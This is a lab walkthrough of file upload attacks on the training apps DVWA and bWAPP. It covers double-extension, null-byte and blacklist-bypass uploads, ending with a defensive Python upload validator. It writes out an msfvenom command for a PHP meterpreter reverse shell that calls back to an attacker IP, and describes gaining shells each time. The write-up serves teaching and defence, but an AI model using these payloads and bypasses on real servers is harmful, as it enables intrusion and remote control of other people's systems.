FILE UPLOAD

File upload vulnerabilities are a major problem in web-based applications. On many web servers, whether the upload feature is exploitable depends entirely on how it is implemented: a weak implementation lets an attacker upload a file containing malicious code that is then executed on the server.

Basic file upload:
A simple PHP file is uploaded to the web server without any restrictions; here the server checks neither the Content-Type nor the file extension.

Set the DVWA security level to Low.

                         {Please look image 01}

Create a PHP backdoor with the following command:
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.3 lport=4444 -f raw

                         {Please look image 02}

Save the output with a PHP extension as img.php.

                         {Please look image 03}

                         {Please look image 04}

We have successfully uploaded a malicious PHP file, and the application returned the directory where the file is stored.

Before executing the uploaded malicious PHP file, we need to start a listener on the attacker machine with Metasploit.

                         {Please look image 05}


The malicious file has been uploaded to 192.168.93.156/dvwa/hackable/uploads/

                         {Please look image 06}

I got a meterpreter session when I opened img.php, which made a reverse connection back to the attacker machine.

                         {Please look image 07}


Double Extension Injection Technique:

For this exercise, we need to change the security level to Medium.

                         {Please look image 08}

This time it did not allow me to upload the malicious PHP file; the application says it will only accept JPEG or PNG images.

                         {Please look image 09}

To bypass this restriction, we hide the real nature of the file by giving it multiple extensions, which confuses the security checks.

Rename the existing malicious file img.php to img.php.png.

Set up the listener with Metasploit,

                         {Please look image 10}

Now we upload the double extension file img.php.png.

                         {Please look image 11}

Before uploading, we need to capture the request with Burp Suite Interceptor, which lets us change the file extension and bypass the client-side security checks.

Burp Suite Interceptor captures the file upload request; we change the file extension before the request is forwarded to the server,

                         {Please look image 12}

                         {Please look image 13}

                         {Please look image 14}

                         {Please look image 15}

The file has been successfully uploaded with the .php extension.
We got a reverse connection when we opened the uploaded malicious file.

Null Byte Injection:
Null byte injection is an exploitation technique that appends a URL-encoded null byte character (%00, i.e. 0x00 in hex) to user-supplied data. In a URL the null byte is written as %00; the raw byte itself has no printable glyph and appears as a blank space.
This injection can alter the intended logic of the application and allow a malicious adversary to gain unauthorized access.

The reason for inserting a null byte is that some application servers' scripting languages still rely on C/C++ libraries to check the filename and content. In C/C++ a string ends at the first \0 (0x00) byte, which is called the null byte.

Hence when the C/C++ string-handling code encounters a null byte, it assumes it has reached the end of the string and stops reading any further.

Repeat the same process to create the backdoor and start the msfconsole listener. This time I have the double extension file img3.php.jpg.

We have captured the request with the help of Burp Suite Interceptor,

                         {Please look image 16}

Added a placeholder string at the end of the malicious file's .php extension, to be turned into a null byte,

                         {Please look image 17}

Image of the hex value,

                         {Please look image 18}

Changing it into a null byte,

                         {Please look image 19}

Review the raw data again: the string is gone and a blank space appears in its place,

                         {Please look image 20}

                         {Please look image 21}

                         {Please look image 22}

The malicious file has been uploaded successfully.
With the listener started, we got a reverse connection when we opened the uploaded malicious file,

                         {Please look image 23}

Blacklisting File Extension:

For this exercise, we use the bWAPP application at the medium security level.

                         {Please look image 24}

                         {Please look image 25}

When I tried uploading the malicious file img3.php, the .php extension was on the blacklist. To bypass this case-sensitive rule, we use an alternative form of the same extension, such as PhP or php3.

Filename: img3.php3

The file has been uploaded successfully.

                         {Please look image 26}

                         {Please look image 27}

                         {Please look image 28}

Started the reverse TCP handler; we got a reverse connection when we opened the uploaded malicious file.
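As an added example, not part of the original write-up or of DVWA/bWAPP, here is the server-side allowlist check a defender would put in front of the upload handler to stop the three bypasses shown on this page: the double extension (img.php.png), the null byte after .php (img3.php followed by 0x00 and .jpg), and alternate spellings of a blacklisted extension (PhP, php3). The applications here are PHP, but the logic is shown in Python; the function names, the allowlist and the sample file names are my own assumptions.

```python
import re
import secrets
from typing import Optional

# Allowlist of image extensions the handler accepts (compared lower-cased).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}

# Leading bytes of each allowed format; the body must match the claimed type.
MAGIC_BYTES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}

# One base name, one short extension: no second dot, no NUL, no path characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def validate_upload(filename: str, content: bytes) -> Optional[str]:
    """Return None when the upload is acceptable, else the rejection reason."""
    # A raw NUL or its URL-encoded form is never legitimate in a file name.
    if "\x00" in filename or "%00" in filename.lower():
        return "null byte in filename"
    # Only the base name is considered; a client-supplied directory is ignored.
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    match = SAFE_NAME.fullmatch(base)
    if match is None:
        # Rejects img.php.png (two extensions) and names with odd characters.
        return "filename not in the allowed form"
    ext = match.group(1).lower()  # PhP, PHP3 etc. are compared lower-cased
    if ext not in ALLOWED_EXTENSIONS:
        # Allowlist, so php3, phtml, PhP all fail without being enumerated.
        return f"extension not allowed: {ext}"
    if not content.startswith(MAGIC_BYTES[ext]):
        return "content does not match the claimed image type"
    return None


def stored_name(ext: str) -> str:
    """Server-chosen random name for an accepted upload; the client's name is never reused."""
    return f"{secrets.token_hex(16)}.{ext.lower()}"


if __name__ == "__main__":
    # Constructed sample names mirroring the bypasses tried in the write-up.
    for name in ("img.php", "img.php.png", "img3.php\x00.jpg", "img3.php3", "photo.png"):
        body = b"\x89PNG\r\n\x1a\n" if name == "photo.png" else b"<?php echo 1; ?>"
        print(f"{name!r:24} -> {validate_upload(name, body) or 'accepted'}")
```

An accepted file is written under the random name from stored_name, so even a file that passes the checks is never reachable at a path the uploader chose.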